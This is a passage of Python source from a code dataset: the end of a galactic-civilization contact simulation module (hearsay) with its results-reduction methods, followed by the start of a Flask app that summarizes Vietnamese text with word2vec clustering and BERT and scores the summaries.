[]\n            S = []\n            D = []\n            F = []\n\n            outdir = p.dir_output + p.exp_id + '/D'\n            for pp in params:\n                (tau_awakening, tau_survive, D_max) = pp\n                k += 1\n                i = 0\n                for experiment in range(p.nran):\n                    A.append(tau_awakening)\n                    S.append(tau_survive)\n                    D.append(D_max)\n\n                    i += 1\n                    j += 1\n                    parts = [outdir, str(int(D_max)), '/', str(k).zfill(5),\n                             '_', str(i).zfill(3) + '.pk']\n                    filename = ''.join(parts)\n\n                    F.append(filename)\n\n            df['tau_awakening'] = A\n            df['tau_survive'] = S\n            df['D_max'] = D\n            df['filename'] = F\n        else:\n            print('spars must be
 a dataframe, list or string')\n\n        # write files list\n        fn = self.config.filenames\n        fname = fn.dir_output + '/' + fn.exp_id\n        fname = fname + '/' + fn.pars_root + '.csv'\n        df.to_csv(fname, index=False)\n\n        self.params = df\n\n    def run(self, parallel=False, njobs=None, interactive=False):\n        \"\"\"Run an experiment.\n\n        An experiment requires a set of at least three parameters, which are\n        taken from the configuration file.\n\n        Parameters\n        ----------\n        parallel : Boolean\n            Flag to indicate if the run is made using the parallelized\n            version. Default: False.\n        njobs : int\n            Number of concurrent jobs for the parallel version.\n            If parallel is False, njobs is ignored.\n        interactive : boolean\n            Flag to indicate if the result of the simulation suite is returned\n            as a variable.\n\n        Returns\n        -------\n        res: list\n            Only returned if interactive=True.\n            Contains the results from the simulations. The size of the\n            list is the number of simulations in the experiment, i.e., the\n            number of lines in self.params.\n            Each element of the list is a dictionary containing the complete\n            list of CCNs and their contacts.\n\n        See also\n        --------\n        hearsay.results.ccn_stats\n\n        Example\n        -------\n        If the following experiment is set:\n        >>> conf.load_config(['nran'], ['2'])\n        >>> A = [5000, 10000, 20000]\n        >>> S = [20000]\n        >>> D = [20000]\n        >>> G.set_parameters(A=A, S=S, D=D)\n        then a total of 6 experiments will be performed. The result of this\n        function is a list of length 6, where each element can be printed\n        with the show_single_ccns method. See that method for more details.\n        \"\"\"\n        if njobs is not None:\n            parallel = True\n\n        if parallel:\n            if njobs is None:\n                njobs = self.config.p.njobs\n            if interactive:\n                res = self.run_suite_II(njobs, interactive)\n            else:\n                self.run_suite_II(njobs)\n        else:\n            if interactive:\n                res = self.run_suite(interactive)\n            else:\n                self.run_suite()\n\n        if interactive:\n            return res\n        else:\n            return None\n\n    def run_suite_II(self, njobs, interactive=False):\n        \"\"\"Run an experiment, parallel version.\n\n        An experiment requires a set of at least three parameters, which are\n        taken from the configuration file.\n\n        Parameters\n        ----------\n        params: the parameters\n        njobs: number of jobs\n        \"\"\"\n        from joblib import Parallel, delayed\n\n        Pll = Parallel(n_jobs=njobs, verbose=5, prefer=\"processes\")\n        params = self.params.values.tolist()\n        ids = np.array(range(len(params))) + 1\n        ntr = [interactive] * len(params)\n        z = zip([self] * len(params), params, ids, ntr)\n        d_experiment = delayed(unwrap_run)\n        results = Pll(d_experiment(i) for i in z)\n\n        df = pd.DataFrame(columns=['tau_awakening', 'tau_survive',\n                                   'D_max', 'filename'])\n\n        p = self.config.p\n        k = 0\n        j = 0\n        for pp in params:\n            # each row carries four entries; the filename is rebuilt below\n            (tau_awakening, tau_survive, D_max, _) = pp\n            k += 1\n            i = 0\n            for experiment in range(p.nran):\n                i += 1\n                j += 1\n                dirName = p.dir_output + p.exp_id + '/D' + str(int(D_max)) + '/'\n                filename = dirName + str(k).zfill(5) + '_'\n                filename = filename + str(i).zfill(3) + '.pk'\n                df.loc[j] = [tau_awakening, tau_survive, D_max, filename]\n\n        # write files\n        fn = self.config.filenames\n        fname = fn.dir_output + '/' + fn.exp_id\n        fname = fname + '/' + fn.pars_root + '.csv'\n        df.to_csv(fname, index=False)\n\n        if interactive:\n            return results\n        else:\n            return None\n\n    def run_suite(self, interactive=False):\n        \"\"\"Make experiment.\n\n        Requires a single value of parameters.\n        Writes output on a file.\n\n        Parameters\n        ----------\n        params (list): A list containing all parameters for the\n            simulation.
 Format, e.g.: [(A1, S1, D1, file1), (A2, S2, D2, file2)]\n\n        Raises\n        ------\n        None\n\n        Returns\n        -------\n        None\n        \"\"\"\n        from os import makedirs, path\n\n        p = self.config.p\n        params = self.params.values.tolist()\n\n        dirName = p.dir_output + p.exp_id\n        try:\n            makedirs(dirName)\n            if p.verbose:\n                print(\"Directory \", dirName, \" Created \")\n        except FileExistsError:\n            print(\"Directory \", dirName, \" already exists\")\n\n        Dl = list(map(list, zip(*params)))[2]\n        D_max_names = [str(int(d)) for d in Dl]\n        D_maxS = list(set(D_max_names))\n\n        for d in D_maxS:\n            dirName = p.dir_output + p.exp_id + '/D' + str(int(d))\n            try:\n                makedirs(dirName)\n                if p.verbose:\n                    print(\"Directory \", dirName, \" Created \")\n            except FileExistsError:\n                print(\"Directory \", dirName, \" already exists\")\n\n        if p.showp:\n            bf1 = \"{desc}: {percentage:.4f}% | \"\n            bf2 = \"{n_fmt}/{total_fmt} ({elapsed}/{remaining})\"\n            bf = ''.join([bf1, bf2])\n            iterator = tqdm(params, bar_format=bf)\n        else:\n            iterator = params\n\n        results = []\n        for pp in iterator:\n            (tau_awakening, tau_survive, D_max, filename) = pp\n            pars = list(pp)\n            if path.isfile(filename):\n                if p.overwrite:\n                    self.run_simulation(p, pars)\n                    pickle.dump(self.MPL, open(filename, \"wb\"))\n                elif interactive:\n                    self.run_simulation(p, pars)\n                    MPL = self.MPL\n                    results.append(MPL)\n            else:\n                self.run_simulation(p, pars)\n                pickle.dump(self.MPL, open(filename, \"wb\"))\n                if interactive:\n                    MPL = self.MPL\n                    results.append(MPL)\n\n            fn = ''.join([p.dir_output, p.exp_id, '/',\n                          self.config.filenames.progress_root, '.csv'])\n            with open(fn, 'a') as file:\n                w = f\"{tau_awakening}, {tau_survive}, {D_max}, {filename}\\n\"\n                file.write(w)\n\n        if interactive:\n            return results\n        else:\n            return None\n\n    def run_simulation(self, p=None, pars=None):\n        \"\"\"Make experiment.\n\n        A single value of parameters.\n\n        Parameters\n        ----------\n        p (configuration object) : configuration object\n        pars (list) : list of (3) parameters:\n            tau_A, tau_S and D_max\n\n        Raises\n        ------\n        None\n\n        Returns\n        -------\n        MPL : list\n\n            MPL is a list of size the number of nodes in the simulation.\n            Each element of this list contains a list whose first element\n            is:\n            [ID of CCN,\n             ID of CCN (repeated),\n             x coordinate of the position in the Galaxy,\n             y coordinate of the position in the Galaxy,\n             time of the A event,\n             time of the D event]\n            Moreover, if there are contacts with this node:\n            [ID of receiving node,\n             ID of emitting node,\n             x coordinate of the position in the Galaxy of emitting node,\n             y coordinate of the position in the Galaxy of emitting node,\n             time of the C event,\n             time of the B event]\n        \"\"\"\n        if p is None:\n            p = self.config.p\n        if pars is None:\n            ps = self.config.p\n            tau_awakening = ps.tau_a_min\n            tau_survive = ps.tau_s_min\n            D_max = ps.d_max_min\n        else:\n            tau_awakening = pars[0]\n            tau_survive = pars[1]\n            D_max = pars[2]\n\n        import numpy as np\n        import random\n        from scipy import spatial as sp\n\n        random.seed()\n        np.random.seed()\n\n        # list of all MPLs\n        MPL = dict()\n\n        # list of active MPLs\n        CHATs = []\n        CHATs_idx = []\n\n        # time initialization: scalar\n        t_now = 0\n\n        # list of future event times: ordered list\n        # [time, ID_emit, ID_receive, case]\n        t_forthcoming = OrderedList()\n\n        # tree structure to search for neighbors\n        if 'tree' in locals():\n            try:\n                del tree\n            except NameError:\n                pass\n\n        # INITIALIZATION\n        # Simulation starts when the first CETI appears:\n        next_event = [0., 0, None, 1]\n        t_forthcoming.add(next_event)\n\n        # SIMULATION LOOP OVER TIME\n        while (t_now < p.t_max):\n\n            
t_now, ID_emit, ID_hear, case = t_forthcoming.head.getData()\n\n            if case == 1:\n\n                # a new CETI appears (case 1: awakening event)\n                ID_new = ID_emit\n                ID_next = ID_new + 1\n                t_new_hola = t_now\n\n                # draw the location where it appears within the GHZ\n                r = np.sqrt(random.random() * p.ghz_outer**2 +\n                            p.ghz_inner**2)\n                o = random.random() * 2. * np.pi\n                x = r * np.cos(o)  # X position on the galactic plane\n                y = r * np.sin(o)  # Y position on the galactic plane\n\n                # draw the active time span\n                t_new_active = np.random.exponential(tau_survive, 1)[0]\n                t_new_chau = t_new_hola + t_new_active\n\n                # add the disappearance time to the list of times\n                next_event = [t_new_chau, ID_new, None, 2]\n                t_forthcoming.add(next_event)\n\n                # add the CETI to the historical list\n                MPL[ID_new] = list()\n                MPL[ID_new].append(\n                    (ID_new, ID_new, x, y, t_new_hola, t_new_chau))\n\n                # draw the appearance time of the next CETI\n                t_next_awakening = np.random.exponential(tau_awakening, 1)[0]\n                t_next_awakening = t_new_hola + t_next_awakening\n                if t_next_awakening < p.t_max:\n                    next_event = [t_next_awakening, ID_next, None, 1]\n                    t_forthcoming.add(next_event)\n\n                if len(CHATs_idx) > 0:\n\n                    # if there are other MPL, compute contacts:\n                    # find all the (IDs of the) MPLs within D_max\n                    query_point = [x, y]\n                    if 'tree' in locals():\n                        try:\n                            idx = tree.query_ball_point(query_point, r=D_max)\n                        except NameError:\n                            pass\n                    else:\n                        idx = []\n\n                    # traverse all MPL within reach\n                    for k in idx:\n\n                        ID_old = CHATs_idx[k]\n\n                        Dx = np.sqrt(\n                            ((np.array(query_point) -\n                              np.array(MPL[ID_old][0][2:4]))**2).sum()\n                        )\n\n                        t_old_hola, t_old_chau = MPL[ID_old][0][4:6]\n\n                        # check if contact is possible\n                        new_can_see_old = (\n                            (Dx < D_max) &\n                            (t_new_hola < t_old_chau + Dx) &\n                            (t_new_chau > t_old_hola + Dx))\n\n                        if new_can_see_old:  # (·) new sees old\n\n                            # :start (type 3 event)\n                            t_new_see_old_start = max(t_old_hola + Dx,\n                                                      t_new_hola)\n                            next_event = [t_new_see_old_start,\n                                          ID_new, ID_old, 3]\n                            t_forthcoming.add(next_event)\n\n                            # :end (type 4 event)\n                            t_new_see_old_end = min(t_old_chau + Dx,\n                                                    t_new_chau)\n                            next_event = [t_new_see_old_end, ID_new, ID_old, 4]\n                            t_forthcoming.add(next_event)\n\n                            contact = (ID_new, ID_old,\n                                       MPL[ID_old][0][2], MPL[ID_old][0][3],\n                                       t_new_see_old_start, t_new_see_old_end)\n                            MPL[ID_new].append(contact)\n\n                        # check if contact is possible\n                        old_can_see_new = (\n                            (Dx < D_max) & (t_new_hola + Dx > t_old_hola) &\n                            (t_new_hola + Dx < t_old_chau))\n\n                        if old_can_see_new:  # (·) old sees new\n\n                            # :start (type 3 event)\n                            t_old_see_new_start = t_new_hola + Dx\n                            next_event = [t_old_see_new_start,\n                                          ID_old, ID_new, 3]\n                            t_forthcoming.add(next_event)\n\n                            # :end (type 4 event)\n                            t_old_see_new_end = min(t_new_chau + Dx, t_old_chau)\n                            next_event = [t_old_see_new_end, ID_old, ID_new, 4]\n                            t_forthcoming.add(next_event)\n\n                            contact = (ID_old, ID_new,\n                                       MPL[ID_new][0][2], MPL[ID_new][0][3],\n                                       t_old_see_new_start, t_old_see_new_end)\n                            MPL[ID_old].append(contact)\n\n                # add the CETI to the list of positions\n                # of active MPLs (CHATs)\n                CHATs.append([x, y])\n                CHATs_idx.append(ID_new)\n\n                # rebuild the tree\n                tree = sp.cKDTree(data=CHATs)\n\n            if case == 2:\n                ID_bye = ID_emit\n\n                # remove the CETI from the list of active MPLs\n                # [ID, x, y, t_new_hola, t_new_chau]\n                try:\n                    id_loc = CHATs_idx.index(ID_bye)\n                    del CHATs[id_loc]\n                    del CHATs_idx[id_loc]\n\n                except ValueError:\n                    # .index raises ValueError when the ID is not present\n                    pass\n\n                # rebuild the tree\n                if len(CHATs) > 0:\n                    tree = sp.cKDTree(data=CHATs)\n\n            if case == 3:\n                pass\n            if case == 4:\n                pass\n\n            # remove the current event from the list
\n            t_forthcoming.remove_first()\n            # exit if there is nothing left to do:\n            if t_forthcoming.size() < 1:\n                break\n            # t_forthcoming.show()\n\n        self.MPL = MPL\n\n    def show_single_ccns(self, MPL=None, interactive=False):\n        \"\"\"Show simulation results.\n\n        Parameters\n        ----------\n        None\n        \"\"\"\n        if MPL is None:\n            CETIs = self.MPL\n        else:\n            CETIs = MPL\n\n        for i in range(len(CETIs)):\n            print('%2d (%5.0f, %5.0f) yr <%5.0f, %5.0f> lyr' %\n                  (CETIs[i][0][1], CETIs[i][0][4],\n                   CETIs[i][0][5], CETIs[i][0][2], CETIs[i][0][3]))\n\n            k = len(CETIs[i]) - 1\n            for j in range(k):\n                Dx = np.sqrt(((\n                    np.array(CETIs[i][0][2:4]) -\n                    np.array(CETIs[i][j+1][2:4]))**2).sum())\n\n                print('%2d sees %2d (%5.0f, %5.0f) yr '\n                      '<%5.0f, %5.0f> lyr distance=%f' % (CETIs[i][j+1][0],\n                                                          CETIs[i][j+1][1],\n                                                          CETIs[i][j+1][4],\n                                                          CETIs[i][j+1][5],\n                                                          CETIs[i][j+1][2],\n                                                          CETIs[i][j+1][3], Dx))\n        if interactive:\n            return CETIs\n\n\nclass Results(C3Net):\n    \"\"\"Results: load and visualize results from simulations and experiments.\"\"\"\n\n    \"\"\"\n    To do:\n    - number of contacts\n    \"\"\"\n\n    def __init__(self, G=None):\n        \"\"\"Instantiate a results object.\n\n        Parameters\n        ----------\n        G: C3Net object\n            An object containing all the data about the simulation suite.\n        \"\"\"\n        self.params = dict()\n        self.config = tuple()\n        if G is not None:\n            self.params = G.params\n            self.config = G.config\n\n    def load(self):\n        \"\"\"Load parameter set and data.\n\n        Load all data generated from an experiment.\n        \"\"\"\n        fn = self.config.filenames\n        fname = fn.dir_output + fn.exp_id\n        fname = fname + '/' + fn.pars_root + '.csv'\n        df = pd.read_csv(fname)\n        self.params = df\n\n    def ccn_stats(self, CCN):\n        \"\"\"Return statistics for a single causally connected network.\n\n        This corresponds to a single simulation run, that gives a list of\n        nodes, its properties and its contacts. The properties of a node are\n        the ID, the times of the A and D events and the position in the\n        (simulated) Galaxy.\n\n        Parameters\n        ----------\n        CCN : dict\n            An object (as read from pickle files) that represents a network of\n            CCNs from a single simulation run\n\n        Returns\n        -------\n        stats : tuple\n            A tuple containing several statistics about the network.\n\n\n        Notes\n        -----\n        The stats tuple includes parameters with counters (1, 2, 3),\n        parameters with CCNs values (4-7) and\n        parameters with contacts values (8-11)\n\n        01. N : Total number of CCNs in the full period. Length=1\n\n        02. M : Total number of contacts (i.e., CCNs that are on the\n                space-time cone of another CCN.)\n\n        03. K : Total number of CCNs that make at least one contact\n                (i.e., CCNs that are on the space-time cone of at least\n                another CCN.)\n\n        04. lP : Time periods for each CCN. Equivalent to the time span\n                 between the A and D events. Length=N\n\n        05. lI : Number of contacts each CETI receives. Length=N\n\n        06. lX : X position within the Galaxy disc. Length=N\n\n        07. lY : Y position within the Galaxy disc. Length=N\n\n        08. lL : Distances between contacted nodes. Length=M\n\n        09. lH : Duration of each contact. Length=M\n\n        10. lW : Time elapsed from awakening to contact. Length=M\n\n        11. 
lF : Time elapsed from awakening to the first contact.\n                 Length=K\n        \"\"\"\n        N = len(CCN)\n        M = 0\n        K = 0\n\n        lP = []\n        lI = []\n        lX = []\n        lY = []\n        lL = []\n        lH = []\n        lW = []\n        lF = []\n\n        for i in range(N):\n\n            k = len(CCN[i])\n            lI.append(k - 1)\n            lP.append(CCN[i][0][5] - CCN[i][0][4])\n            lX.append(CCN[i][0][2])\n            lY.append(CCN[i][0][3])\n\n            # count every contact towards the total M\n            M += k - 1\n\n            firstcontact = 1.e8\n\n            for j in range(1, k):  # traverse contacts\n\n                earlier = CCN[i][j][4] - CCN[i][0][4]\n                firstcontact = min(earlier, firstcontact)\n                Dx = np.sqrt(((\n                    np.array(CCN[i][0][2:4]) -\n                    np.array(CCN[i][j][2:4]))**2).sum())\n\n                lW.append(earlier)\n                lL.append(Dx)\n                lH.append(CCN[i][j][5] - CCN[i][j][4])\n\n            if k > 1:\n                # this CCN made at least one contact\n                K += 1\n                lF.append(firstcontact)\n\n        return (N, M, K), (lP, lI, lX, lY, lL, lH, lW, lF)\n\n    def redux(self, subset=None):\n        \"\"\"Redux experiment.\n\n        Given a set of parameters, returns the global values\n\n        Parameters\n        ----------\n        subset : boolean array\n            Filter to the values in self.params\n\n        Returns\n        -------\n        N : list\n            Total number of nodes for each simulation in self.params\n        M : list\n            Total number of contacts for each simulation in self.params\n            A contact is produced any time a node enters the light\n            cone of another node.\n        K : list\n            Total number of nodes that make at least one contact, for\n            each simulation in self.params.\n        lP : array\n            Time periods from t_A to t_D.\n        lI : array\n            Number of contacts that each node receives.\n        lX : array\n            X position within the Galaxy disc.\n        lY : array\n            Y position within the Galaxy disc.\n        lL : array\n            Distances between contacted nodes.\n        lH : array\n            Duration of each contact.\n        lW : array\n            Time elapsed from awakening to contact.\n        lF : array\n            Time elapsed from awakening to the first contact.\n        \"\"\"\n        import pickle\n\n        if subset is None:\n            D = self.params\n        else:\n            D = self.params[subset]\n\n        N = []\n        M = []\n        K = []\n\n        lP = []\n        lI = []\n        lX = []\n        lY = []\n        lL = []\n        lH = []\n        lW = []\n        lF = []\n\n        for filename in D['filename']:\n\n            try:\n                CETIs = pickle.load(open(filename, \"rb\"))\n            except EOFError:\n                CETIs = []\n\n            t1, t2 = self.ccn_stats(CETIs)\n\n            N.append(t1[0])\n            M.append(t1[1])\n            K.append(t1[2])\n            lP.append(t2[0])\n            lI.append(t2[1])\n            lX.append(t2[2])\n            lY.append(t2[3])\n            lL.append(t2[4])\n            lH.append(t2[5])\n            lW.append(t2[6])\n            lF.append(t2[7])\n\n        return({\n            'N': N,\n            'M': M,\n            'K': K,\n            'lP': lP,\n            'lI': lI,\n            'lX': lX,\n            'lY': lY,\n            'lL': lL,\n            'lH': lH,\n            'lW': lW,\n            'lF': lF})\n\n    def redux_1d(self, subset=None, applyto=None):\n        \"\"\"Redux experiment.\n\n        Compute statistics for the set of parameters limited to subset.\n\n        Parameters\n        ----------\n        subset: logical array\n            Filter for the full parameter set.\n        applyto: string\n            Name of the variable to be used as X-axis.\n\n        Returns\n        -------\n        dict of reduced quantities (see the keys in the return statement).\n        \"\"\"\n        import pickle\n        import numpy as np\n\n        if subset is None:\n            D = self.params\n        else:\n            D = self.params[subset]\n\n        index = []\n        firstc = []\n        ncetis = []\n        awaken = []  # time span the CETI is active\n        waiting = []  # time it waits until the first contact\n        inbox = []  # number of CETIs it is listening to\n        distancias = []  # distances to the contacted CETIs\n        hangon = []  # time span it spends listening to another CETI\n        x = []\n        y = []\n        N = len(D)\n        kcross = 0\n\n        for filename in D['filename']:\n\n            try:\n                CETIs = pickle.load(open(filename, \"rb\"))\n            except EOFError:\n                CETIs = []\n\n            M = len(CETIs)\n            ncetis.append(M)\n\n            for i in range(M):\n\n                
k = len(CETIs[i])\n                inbox.append(k - 1)\n                awaken.append(CETIs[i][0][5] - CETIs[i][0][4])\n                index.append(kcross)\n                x.append(CETIs[i][0][2])\n                y.append(CETIs[i][0][3])\n\n                firstcontact = 1.e8\n\n                for j in range(1, k):  # traverse contacts\n\n                    earlier = CETIs[i][j][4] - CETIs[i][0][4]\n                    firstcontact = min(earlier, firstcontact)\n                    Dx = np.sqrt(((\n                        np.array(CETIs[i][0][2:4]) -\n                        np.array(CETIs[i][j][2:4]))**2).sum())\n\n                    waiting.append(earlier)\n                    distancias.append(Dx)\n                    hangon.append(CETIs[i][j][5] - CETIs[i][j][4])\n\n                if k > 1:\n                    firstc.append(firstcontact)\n\n            kcross += 1\n\n        N = 12\n        count = [0] * N\n        for i in range(N):\n            count[i] = inbox.count(i)\n\n        return({\n            # all CETIs\n            'A': awaken,  # lifetime of the CETI\n            'inbox': inbox,  # number of contacts a single CETI makes\n            'index': index,  # ID of the CETI in the simulation run\n            'x': x,  # x position in the galaxy\n            'y': y,  # y position in the galaxy\n            #\n            # all pairs of CETIs that make contact\n            'dist': distancias,  # distance between communicating CETIs\n            'hangon': hangon,  # duration of the contact\n            'w': waiting,  # time elapsed from awakening to contact\n            'c1': firstc,  # time of the first contact\n\n            # all simulated points in the parameter space\n            'n': ncetis,  # total number of CETIs in each simulated point\n            #\n            # chosen integer bins in multiplicity\n            'count': count})  # distribution of the multiplicity of contacts\n\n    def redux_2d(self, show_progress=False):\n        \"\"\"Redux experiment to 2D matrices.\n\n        Takes all the experiments in self.params and reduces the data\n        to matrices containing:\n        1) the fraction of nodes that make no contact during (t_A, t_D)\n        2) the fraction of contacted nodes whose first contact happens at t_A\n\n        Parameters\n        ----------\n        show_progress : boolean\n            Whether a progress indicator is shown\n\n        Returns\n        -------\n        m1 : ndarray\n            Matrix containing the fraction of nodes without any contact\n            in (t_A, t_D) as a function of tau_awakening and tau_survive values\n\n        m2 : ndarray\n            Matrix containing the fraction of contacted nodes whose first\n            contact happens at t_A, as a function of tau_awakening and\n            tau_survive values\n\n        Notes\n        -----\n        To do: allow to compute any quantity.\n        \"\"\"\n        import pickle\n        import numpy as np\n\n        # parameters\n        p = self.config.p\n\n        A = self.params['tau_awakening']\n        S = self.params['tau_survive']\n        A = list(set(A))\n        S = list(set(S))\n        A.sort()\n        S.sort()\n\n        print(A)\n        print(S)\n\n        N1 = len(A)\n        N2 = len(S)\n        m1 = np.zeros((N1, N2))\n        m2 = np.zeros((N1, N2))\n\n        l0 = self.params['D_max'] == self.params['D_max'][0]\n\n        toolbar_width = 40\n\n        print(self.params.keys())\n\n        for i, a in enumerate(A):\n            if p.verbose:\n                print(\"%2.2d/%2.2d\" % (i + 1, N1))\n            l1 = abs(self.params['tau_awakening'] - a) < 1.e-5\n\n            if show_progress:\n                sys.stdout.write(\"[%s]\" % (\" \" * toolbar_width))\n                sys.stdout.flush()\n                sys.stdout.write(\"\\b\" * (toolbar_width + 1))\n            for j, s in enumerate(S):\n                if show_progress:\n                    sys.stdout.write(\"-\")\n                    sys.stdout.flush()\n\n                l2 = abs(self.params['tau_survive'] - s) < 1.e-5\n\n                cond = l0 & l1 & l2\n\n                if len(cond) > 0:\n\n                    D = self.redux_1d(subset=cond)\n\n                    inbox = D['inbox']\n                    firstc = D['c1']\n\n                    # m1 : fraction of nodes with no contact in (t_A, t_D)\n                    m1[i][j] = inbox.count(0) / max(len(inbox), 1)\n\n                    # m2 : fraction of contacted nodes whose first contact\n                    # happens right at t_A\n                    m2[i][j] = firstc.count(0.) / max(len(firstc), 1)\n                else:\n                    m1[i][j] = 0.\n                    m2[i][j] = 0.\n\n            if
 show_progress:\n                sys.stdout.write(\"]\\n\")  # this ends the progress bar\n\n        m1 = np.transpose(m1)\n        m2 = np.transpose(m2)\n\n        fn = self.config.filenames\n        fname = fn.dir_output + fn.exp_id\n        fname1 = fname + '/m1.pk'\n        fname2 = fname + '/m2.pk'\n\n        print(fname1)\n        print(fname2)\n\n        pickle.dump(m1, open(fname1, 'wb'))\n        pickle.dump(m2, open(fname2, 'wb'))\n\n        return((m1, m2))\n\n    def show_ccns(self, i, interactive=False):\n        \"\"\"Show simulation results.\n\n        Parameters\n        ----------\n        None\n        \"\"\"\n        filename = self.params.loc[i, 'filename']\n        try:\n            CETIs = pickle.load(open(filename, \"rb\"))\n        except EOFError:\n            CETIs = []\n\n        for i in range(len(CETIs)):\n            print('%2d (%5.0f, %5.0f) yr <%5.0f, %5.0f> lyr' %\n                  (CETIs[i][0][1], CETIs[i][0][4],\n                   CETIs[i][0][5], CETIs[i][0][2], CETIs[i][0][3]))\n\n            k = len(CETIs[i]) - 1\n            for j in range(k):\n                Dx = np.sqrt(((\n                    np.array(CETIs[i][0][2:4]) -\n                    np.array(CETIs[i][j+1][2:4]))**2).sum())\n\n                print('%2d sees %2d (%5.0f, %5.0f) yr '\n                      '<%5.0f, %5.0f> lyr distance=%f' % (CETIs[i][j+1][0],\n                                                          CETIs[i][j+1][1],\n                                                          CETIs[i][j+1][4],\n                                                          CETIs[i][j+1][5],\n                                                          CETIs[i][j+1][2],\n                                                          CETIs[i][j+1][3], Dx))\n        if interactive:\n            return CETIs\n","repo_name":"mlares/hearsay","sub_path":"hearsay/hearsay.py","file_name":"hearsay.py","file_ext":"py","file_size_in_byte":48906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
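Pulling the pieces of the hearsay module together, a hedged end-to-end sketch of the intended workflow. It assumes the package is importable as hearsay.hearsay (matching the record's path hearsay/hearsay.py) and that a valid experiment .ini file exists at the module's default location ../set/experiment.ini; the A/S/D grid values are arbitrary:

from hearsay import hearsay

conf = hearsay.Parser()              # falls back to ../set/experiment.ini
conf.load_config(['nran'], ['2'])    # override: 2 realizations per grid point

G = hearsay.C3Net(conf)
G.set_parameters(A=[5000, 10000], S=[20000], D=[20000])  # arbitrary grid
G.run()                              # serial; G.run(njobs=4) runs in parallel

R = hearsay.Results(G)
R.load()
d = R.redux()
print(d['N'])  # number of nodes in each simulation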
{"seq_id":"3782797241","text":"from flask import Flask, request\nfrom flask import json\nfrom flask.json import jsonify\nfrom flask.templating import render_template\nfrom flask_cors import CORS\nimport nltk\nfrom gensim.models import KeyedVectors\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import pairwise_distances_argmin_min\nimport pickle\nfrom revolution_score import bert_score_compute, rouge_score_compute\nfrom pyvi import ViTokenizer\nimport numpy as np\nfrom summarizer import Summarizer\n\napp = Flask(__name__)\nCORS(app)\n\nDATA_DIR = './data/plaintext/'\nMANUAL_DIR = './data/manual_summary/'\n\nprint(\"Initialize Summarizer...\")\nmodel = Summarizer()\nprint(\"Done\")\n\nprint(\"Downloading punkt...\")\ntry:\n    nltk.data.find('tokenizers/punkt')\n    print('Existed')\nexcept LookupError:\n    nltk.download('punkt')\n    print(\"Downloaded\")\n\nvocab = None\nprint(\"Loading vocab...\")\ntry:\n    vocab_file = open(\"vocab.pkl\", \"rb\")\n    vocab = pickle.load(vocab_file)\n    vocab_file.close()\nexcept Exception:\n    w2v = KeyedVectors.load_word2vec_format('we_knn/wiki.vi.vec')\n    # map each word to its embedding vector; key_to_index only holds\n    # integer indices, which cannot be summed into a sentence vector\n    vocab = {word: w2v.get_vector(word) for word in w2v.key_to_index}\n    vocab_file = open(\"vocab.pkl\", \"wb\")\n    pickle.dump(vocab, vocab_file)\n    vocab_file.close()\nprint(\"Done\")\n\n\n@app.route('/')\ndef index():\n    return render_template('base.html')\n\n\n@app.route('/score', methods=['GET'])\ndef score_get():\n    return render_template('score.html')\n\n\n@app.route('/score', methods=['POST'])\ndef score_post():\n    request_data = request.json\n    plaintext_dir = DATA_DIR + str(request_data[\"plaintext_dir\"])\n    manual_summary_dir = MANUAL_DIR + str(request_data[\"plaintext_dir\"])\n    print(plaintext_dir, manual_summary_dir)\n    modeling = str(request_data[\"model\"])\n    method = str(request_data[\"method\"])\n\n    file = open(plaintext_dir, 'r', encoding='utf8')\n    plaintext = file.read()\n    file.close()\n    file = open(manual_summary_dir, 'r', encoding='utf8')\n    manual_summary = file.read()\n    file.close()\n\n    m_s = process(manual_summary)\n    processed = process(plaintext)\n\n    sentences = nltk.sent_tokenize(m_s)\n\n    nsum1 = len(sentences)\n    print(nsum1, end=' ')\n    summary = \"\"\n\n    if modeling == 'bert':\n        # NOTE: the target sentence count is passed through the ratio\n        # argument here; recent bert-extractive-summarizer releases expose\n        # a num_sentences parameter for this purpose\n        summary = ''.join(model(\n            body=processed,\n            ratio=float(nsum1),\n            min_length=0,\n            use_first=False\n        ))\n        summary = summary.replace('_', ' ')\n    if modeling == 'word2vec':\n        sentences = nltk.sent_tokenize(plaintext)\n        X = []\n        for sentence in sentences:\n            sentence = ViTokenizer.tokenize(sentence)\n            words = sentence.split(\" \")\n            sentence_vec = np.zeros((300))\n            for word in words:\n                if word in vocab:\n                    # sum the vector of every in-vocabulary word; an early\n                    # break here would keep only the first matched word\n                    sentence_vec += vocab[word]\n            X.append(sentence_vec)\n        kmeans = KMeans(n_clusters=nsum1)\n        kmeans.fit(X)\n\n        avg = []\n        for j in range(nsum1):\n            idx = np.where(kmeans.labels_ == j)[0]\n            avg.append(np.mean(idx))\n        closest, _ = pairwise_distances_argmin_min(kmeans.cluster_centers_, X)\n        ordering = sorted(range(nsum1), key=lambda k: avg[k])\n        summary = ' '.join([sentences[closest[idx]] for idx in ordering])\n        summary = summary.replace('...', '')\n    print(len(summary.strip().split('. ')))\n    p, r, f1 = 0, 0, 0\n\n    print(m_s)\n    print(summary)\n\n    if method == 'bert':\n        p, r, f1 = bert_score_compute(summary, manual_summary, 'vi')\n    if method == 'rouge':\n        p, r, f1 = rouge_score_compute(summary, manual_summary, 'l')\n\n    resp = {\n        \"model-summarized\": summary,\n        \"manual-summarized\": m_s,\n        \"paragraph\": plaintext,\n        \"p\": p,\n        \"r\": r,\n        \"f1\": f1\n    }\n    return jsonify(resp)\n\n\n@app.route('/word2vec', methods=['GET'])\ndef knn_get():\n    return render_template('knn.html')\n\n\n@app.route('/word2vec', methods=['POST'])\ndef knn_post():\n    data = request.json\n    body = process(str(data[\"body\"]))\n    print(body)\n    n_clusters = int(data[\"n_clusters\"])\n    sentences = nltk.sent_tokenize(body)\n    X = []\n    for sentence in sentences:\n        sentence = ViTokenizer.tokenize(sentence)\n        words = sentence.split(\" \")\n        sentence_vec = np.zeros((300))\n        for word in words:\n            if word in vocab:\n                # sum every in-vocabulary word vector (no early break)\n                sentence_vec += vocab[word]\n        X.append(sentence_vec)\n    kmeans = KMeans(n_clusters=n_clusters)\n    kmeans.fit(X)\n\n    avg = []\n    for j in range(n_clusters):\n        idx = np.where(kmeans.labels_ == j)[0]\n        avg.append(np.mean(idx))\n    closest, _ = pairwise_distances_argmin_min(kmeans.cluster_centers_, X)\n    ordering = sorted(range(n_clusters), key=lambda k: avg[k])\n    summary = ' '.join([sentences[closest[idx]] for idx in ordering])\n    return jsonify({\"summarized\": ''.join(summary)})\n\n\n@app.route('/bert', methods=['GET'])\ndef bert_get():\n    return 